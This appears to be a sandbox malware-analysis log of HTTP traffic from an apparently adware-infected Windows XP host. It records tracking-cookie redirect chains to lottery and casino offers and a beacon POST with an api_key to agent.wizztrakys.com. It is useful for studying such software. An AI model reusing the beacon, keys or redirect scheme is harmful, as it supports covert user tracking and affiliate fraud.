],[name=otherregion]').blur( function(){ getBlurTime(focus_time,this.n
ame);  }); // get time when we loose focus on input field ..    // get
 time when we submit the form and subtract this time and load_time to 
get the total form submission time..    $('[name=formreg]').submit( fu
nction(){ getBlurTime(load_time,'formreg');  }); .}..function getBlurT
ime(focus_time,input) {.    var blur_time = new Date(); // get current
 time onBlur for particular input field.    var time = blur_time - foc
us_time; // subtract focus time and blur time to total focus time for 
that particular input.    // now we need to store this focus time for 
each input, so create hidden element .    // if we already have hidden
 element then  add old value with new time and update this hidden fiel
d value.    if ($('#time_' input '').length) {.        var old_tim
<<< skipped >>>

GET /xmljs/swfobject.2.2.82125.js HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: f.pinid.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: Apache/2.2.31

Expires: Sun, 15 Oct 2017 11:57:03 GMT

Cache-Control: private

Content-Type: text/javascript

Content-Length: 10220

Accept-Ranges: bytes

Date: Sat, 15 Oct 2016 06:08:17 GMT

Via: 1.1 varnish

Age: 0

Connection: keep-alive

X-Served-By: cache-lhr6330-LHR

X-Cache: MISS

X-Cache-Hits: 0

X-Timer: S1476511697.022355,VS0,VE83

Vary: Accept-Encoding
/*.SWFObject v2.2 <hXXp://code.google.com/p/swfobject/> ..is rel
eased under the MIT License <hXXp://VVV.opensource.org/licenses/mit
-license.php> .*/.var swfobject=function(){var D="undefined",r="obj
ect",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="applicat
ion/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=
window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=f
alse,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D
&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.use
rAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/wi
n/.test(ah),ac=Y?/mac/.test(Y):/mac/.test(ah),af=/webkit/.test(ah)?par
seFloat(ah.replace(/^.*webkit\/(\d (\.\d )?).*$/,"$1")):false,X=! "\v1
",ag=[0,0,0],ab=null;if(typeof t.plugins!=D&&typeof t.plugins[S]==r){a
b=t.plugins[S].description;if(ab&&!(typeof t.mimeTypes!=D&&t.mimeTypes
[q]&&!t.mimeTypes[q].enabledPlugin)){T=true;X=false;ab=ab.replace(/^.*
\s (\S \s \S $)/,"$1");ag[0]=parseInt(ab.replace(/^(.*)\..*$/,"$1"),10
);ag[1]=parseInt(ab.replace(/^.*\.(.*)\s.*$/,"$1"),10);ag[2]=/[a-zA-Z]
/.test(ab)?parseInt(ab.replace(/^.*[a-zA-Z] (.*)$/,"$1"),10):0}}else{i
f(typeof O.ActiveXObject!=D){try{var ad=new ActiveXObject(W);if(ad){ab
=ad.GetVariable("$version");if(ab){X=true;ab=ab.split(" ")[1].split(",
");ag=[parseInt(ab[0],10),parseInt(ab[1],10),parseInt(ab[2],10)]}}}cat
ch(Z){}}}return{w3:aa,pv:ag,wk:af,ie:X,win:ae,mac:ac}}(),k=function(){
if(!M.w3){return}if((typeof j.readyState!=D&&j.readyState=="comple
<<< skipped >>>

GET /?sov=5388363&hid=eoewomqgokemi&&redid=7931&gsid=68&campaign_id=106&id=XNSX.3270664418.497271.63a7f377f8.14335.2e6c1690aa2e2344ccce41cfc15da3b5::pc-r7931-t68&impid=bfe8920c-929d-11e6-8baf-aa1f778d2780 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Connection: Keep-Alive

Host: ovuzz.win-land.0698.ws

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:08:11 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"

Set-Cookie: ci_session=2v36Y5oNqAShK/79z3kNn/y6TT3j7kcFgAx+WlPgFahvMIUHic10x0fOlPjcU/1t1SJa83CqwH/gn7VnneUqINEvP+oP5fb/3EQtt3DsPA78B9YKuQxtqDRKK1ZL9Wh2nchd3hJJKJ7OoxWVpA3iLSNXRZgcQeTdAXFm1+XXOCHKD51umn+QrYkw/5fs3pCGmKUvja3In7rMEfEOj9NCFWrDlpLx4Su+mTXNdmIEBBZMJmXY9LVtAcBhkOYYgiaXWB81HZOq3UZiVnYNHCBe7vZ1UkB94/IS8wy0uvC1EwIzqFOnmaiML8luXhlLgILzDyyCaBJihqoYI7p4HPaM3xVyGZUOvw7luplt+BP0dTOLvIku5QDWYKRD1pPlrhxtd9+mvgtOQpx1Ud3PNj1j7lpOe/q0hcAjq/sPgbqnoxOFGp6RAwGN4scfXhvTZjVghJWASE6UkUjmGL/UijjTrw==; expires=Sun, 16-Oct-2016 06:08:11 GMT; Max-Age=86400; path=/; domain=.ovuzz.win-land.0698.ws

X-Source: Mini

Set-Cookie: id=XNSX.3270664418.497271.63a7f377f8.14335.2e6c1690aa2e2344ccce41cfc15da3b5::pc-r7931-t68; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: SITE_ID=5388363; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: sov=5388363; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: tov=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: mov=nr.ytsurvey.mini; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: redid=7931; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: campaign_id=106; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: gsid=68; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: impid=bfe8920c-929d-11e6-8baf-aa1f778d2780; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: URI=sov=5388363&hid=eoewomqgokemi&&redid=7931&gsid=68&campaign_id=106&id=XNSX.3270664418.497271.63a7f377f8.14335.2e6c1690aa2e2344ccce41cfc15da3b5%3A%3Apc-r7931-t68&impid=bfe8920c-929d-11e6-8baf-aa1f778d2780; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: templateid=47562; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: path=redirect; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: version=533364; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: tags[47562][expand_enable]=-1; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: tags[47562][alert_enable]=0; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: tags[47562][audio_enable]=0; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: tags[47562][pop_enable]=0; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: tags[533364][expand_enable]=-1; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: tags[533364][alert_enable]=0; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: tags[533364][audio_enable]=0; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: tags[533364][pop_enable]=0; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: content=533364; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: token=de4666ba994177fba59ec9551bfbc3f0; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: rpm=68; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: vid=108668; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: log_5388363=1; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: id=XNSX.3270664418.497271.63a7f377f8.14335.2e6c1690aa2e2344ccce41cfc15da3b5::pc-r7931-t68; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: SITE_ID=5388363; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: sov=5388363; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: tov=533364; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: mov=nr.ytsurvey.mini; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: redid=7931; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: campaign_id=106; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: gsid=68; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: impid=bfe8920c-929d-11e6-8baf-aa1f778d2780; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

X-Sov: 5388363

X-Rot: 533364

Expires: Mon, 01 Jan 2001 00:00:00 GMT

Cache-Control: no-cache

Pragma: no-cache

Set-Cookie: noshid=eoewomqgokemi; expires=Sun, 16-Oct-2016 06:09:51 GMT; Max-Age=86500; path=/; domain=.0698.ws

Content-Encoding: gzip
d3..............M..0....).,[email protected].|.&..x
..C.W.PZ...\..l.]..Y. .%j. ....uppG....^..m.c....d.\.. P.'......8.;...
.J8T....m{.HR. .gAS...H..R.{..;..1....sB.4.S!......p0.$.p<.&a...5..
..  N.....0......
<<< skipped >>>

GET /FRE298certifiedwinnerALL.html HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: ovuzz.win-land.0698.ws

Connection: Keep-Alive

Cookie: ci_session=2v36Y5oNqAShK/79z3kNn/y6TT3j7kcFgAx+WlPgFahvMIUHic10x0fOlPjcU/1t1SJa83CqwH/gn7VnneUqINEvP+oP5fb/3EQtt3DsPA78B9YKuQxtqDRKK1ZL9Wh2nchd3hJJKJ7OoxWVpA3iLSNXRZgcQeTdAXFm1+XXOCHKD51umn+QrYkw/5fs3pCGmKUvja3In7rMEfEOj9NCFWrDlpLx4Su+mTXNdmIEBBZMJmXY9LVtAcBhkOYYgiaXWB81HZOq3UZiVnYNHCBe7vZ1UkB94/IS8wy0uvC1EwIzqFOnmaiML8luXhlLgILzDyyCaBJihqoYI7p4HPaM3xVyGZUOvw7luplt+BP0dTOLvIku5QDWYKRD1pPlrhxtd9+mvgtOQpx1Ud3PNj1j7lpOe/q0hcAjq/sPgbqnoxOFGp6RAwGN4scfXhvTZjVghJWASE6UkUjmGL/UijjTrw==; id=XNSX.3270664418.497271.63a7f377f8.14335.2e6c1690aa2e2344ccce41cfc15da3b5::pc-r7931-t68; SITE_ID=5388363; sov=5388363; mov=nr.ytsurvey.mini; redid=7931; campaign_id=106; gsid=68; impid=bfe8920c-929d-11e6-8baf-aa1f778d2780; URI=sov=5388363&hid=eoewomqgokemi&&redid=7931&gsid=68&campaign_id=106&id=XNSX.3270664418.497271.63a7f377f8.14335.2e6c1690aa2e2344ccce41cfc15da3b5%3A%3Apc-r7931-t68&impid=bfe8920c-929d-11e6-8baf-aa1f778d2780; templateid=47562; path=redirect; v
HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:08:12 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"

X-Source: Mini

Set-Cookie: id=XNSX.3270664418.497271.63a7f377f8.14335.2e6c1690aa2e2344ccce41cfc15da3b5::pc-r7931-t68; expires=Sun, 16-Oct-2016 06:09:52 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: SITE_ID=5388363; expires=Sun, 16-Oct-2016 06:09:52 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: sov=5388363; expires=Sun, 16-Oct-2016 06:09:52 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: tov=533364; expires=Sun, 16-Oct-2016 06:09:52 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: mov=nr.ytsurvey.mini; expires=Sun, 16-Oct-2016 06:09:52 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: redid=7931; expires=Sun, 16-Oct-2016 06:09:52 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: campaign_id=106; expires=Sun, 16-Oct-2016 06:09:52 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: gsid=68; expires=Sun, 16-Oct-2016 06:09:52 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: ref=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/; domain=.ovuzz.win-land.0698.ws

Set-Cookie: impid=bfe8920c-929d-11e6-8baf-aa1f778d2780; expires=Sun, 16-Oct-2016 06:09:52 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

X-Rot: 533364

X-Sov: 5388363

X-Jump: FRE298certifiedwinnerALL.html

X-Jump-Data: a:8:{s:2:"id";s:5:"53378";s:6:"weight";s:3:"100";s:4:"slug";s:29:"FRE298certifiedwinnerALL.html";s:11:"landingpage";s:76:"hXXp://VVV.freelotto.com/offer.asp?offer=1066987&affiliateid={SOV}&tid={S2S}";s:5:"subid";s:4:"MINI";s:8:"redirect";s:2:"JS";s:8:"offer_id";s:0:"";s:3:"pos";s:3:"100";}

X-Jump-Redirect: hXXp://VVV.freelotto.com/offer.asp?offer=1066987&affiliateid={SOV}&tid={S2S}

X-Jump-Vars: a:2:{i:0;a:2:{i:0;s:5:"{SOV}";i:1;s:3:"SOV";}i:1;a:2:{i:0;s:5:"{S2S}";i:1;s:3:"S2S";}}

Set-Cookie: cl=668d6cba-f9e3-4038-9a03-fcf3a800299e; expires=Sun, 16-Oct-2016 06:09:52 GMT; Max-Age=86500; path=/; domain=.ovuzz.win-land.0698.ws

X-Jump-To: hXXp://VVV.freelotto.com/offer.asp?offer=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e

Expires: Mon, 01 Jan 2001 00:00:00 GMT

Cache-Control: no-cache

Pragma: no-cache

Content-Encoding: gzip
ed..............=R.0.F..j]..b0.k. .Qk..x.?.Q.p{[email protected]&Jq0..8...q
x...6...sn..j..4..Z... P..q%.f.,...AMDs..k......L...e...2/Bl..w.c!*..$
..X9,..-.s.T..O.}....h...R...Y)=*w...(..N...N..y......w...0.0...]....B
..m...\.8d....Z..}9.....y........0..
<<< skipped >>>

GET /vulkanchampion/p9302/?atp=MH RON&plid=1706&bnid=7462&goto=sitereg&face=casino HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: cosmicwin.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Keep-Alive: timeout=3

Vary: Accept-Encoding

Cache-Control: no-cache

Date: Sat, 15 Oct 2016 06:08:11 GMT

Set-Cookie: promouuid=PP5801c7cba9aa3; expires=Tue, 16-Jan-4829 14:19:11 GMT; Max-Age=88746221460; path=/; httponly

Set-Cookie: 3eca792413c698ac9e2064835341acba=1; expires=Sat, 15-Oct-2016 06:23:11 GMT; Max-Age=900; path=/; httponly

Set-Cookie: _MHRON_p9302=1; expires=Sat, 15-Oct-2016 06:23:11 GMT; Max-Age=900; path=/; httponly

Content-Encoding: gzip
b09.............X.n.....S......KR.e..X.l)NcY.,.M......c-g..!%."...e...
H..h....~.>I..].l....]...s......l.....'.=./..0....|p...V.....V..Lg.
PrzrP.KJ...,.bdJf:...~a...........:......^^z.Igs?x.R....>...d,##..L
...........w.wd..M..)j..._..6Yc6.7.z:.n..4.TX...m.r..X.vx....k....%...
.V..y1hOZ.6..d.#..*.....~.l...(..r...%.....4.....:...D.{.z...c....4ji.
...2.V....x....2.......r.............K..~.w.8M.f 28....q..:.s....#.&..
.?`hm.....~..1.~{.G.f....P..&...'B.xm....Q.TD.......o..3.!..S....?....
....83j.6F......Z ....1...l......D.X...2....!.`D.....R:.".BVH.y..;.$..
.P...xp...F...q.b_ [.....G......K...~X*....-|.y.m:..?w....GZ..Bm.i..:.
tc.39.%.,..9S. .....^..tW..P..:......hh..N..Q...x..%.A.....$.....yk...
.E.....Q.C6..S.I.....B.Ng..vK......fs...,.,..<W .26...K.y..........
/...I.l.B..`C5..8.r..>....`.#"....T..d.....l.`c]\r.=......0vLpe(B.`
6.....|'^...|B.....r..R...r.3p.....R...tt.Bl...f..eE.z.xd....,;:.O..qm
..5hu......R7..s.._....F..)X.Q.W..i.......5h...M=......onm..j...P..[z.
.b.........7.>[...4.-p-#..z.4...&f....q."c...h.gvQ...L....e.l..d...
.Z3j...r..D."2.|X._.."..T...,.....9....:w-..........3............xy...
G....nc../.$_O...Dxl..u>..H.b.k......[.&..c.N... ...5.?.t.dc.XfiH..
.8HEf..:k........z.$..M.K.:_...,5s..Na.H..b........o3..Wb%.......<.
9.{,:KU.&y.`......*........s....cR..yZ\.].\t..i.I.W.vE..!......0......
.H.:o.Agz....<.".(..DTc.W.B^...E....s.y..M*(.l....B....e...C..9.*w.
.?|rN.|Y...0.. .......ry..m{.Ro.Ji^..|....I...*.....AX.f....E9....T...
.p.g...(..o...B..*....f.0.O. ...'.o.!.b^v.(.-.,.......'|j[6.. .U..
<<< skipped >>>

POST /csdi/wizzcaster/68 HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Host: agent.wizztrakys.com

Content-Length: 44

Expect: 100-continue

Connection: Keep-Alive

HTTP/1.1 100 Continue
....



api_key=e3b93cef-8bd4-11e5-8538-0cc47a47968c

HTTP/1.1 200 OK

Date: Sat, 15 Oct 2016 06:08:08 GMT

Server: Apache/2.4.10 (Debian)

Set-Cookie: PHPSESSID=e4atgeb5ctae3l7lm4vcjf8p51; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Access-Control-Allow-Origin: *

Content-Length: 29

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}HTTP/1.1 200 OK..Date: Sat, 15 Oct 2016 0
6:08:08 GMT..Server: Apache/2.4.10 (Debian)..Set-Cookie: PHPSESSID=e4a
tgeb5ctae3l7lm4vcjf8p51; path=/..Expires: Thu, 19 Nov 1981 08:52:00 GM
T..Cache-Control: no-store, no-cache, must-revalidate, post-check=0, p
re-check=0..Pragma: no-cache..Access-Control-Allow-Origin: *..Content-
Length: 29..Keep-Alive: timeout=10, max=100..Connection: Keep-Alive..C
ontent-Type: text/html; charset=UTF-8..{"message":"Track was added"}..

GET /offer.asp?offer=10670975&id= HTTP/1.1

Accept: */*

Referer: hXXp://VVV.freelotto.com/register.asp?skin=CertifiedWinnerRSP&noepu=1&partner=1066987&affiliateid=5388363&tid=668d6cba-f9e3-4038-9a03-fcf3a800299e&utm_source=YTZ&utm_medium=Display&utm_term=CPA&utm_content=CertifiedWinnerRSP&utm_campaign=EveryoneWinsTV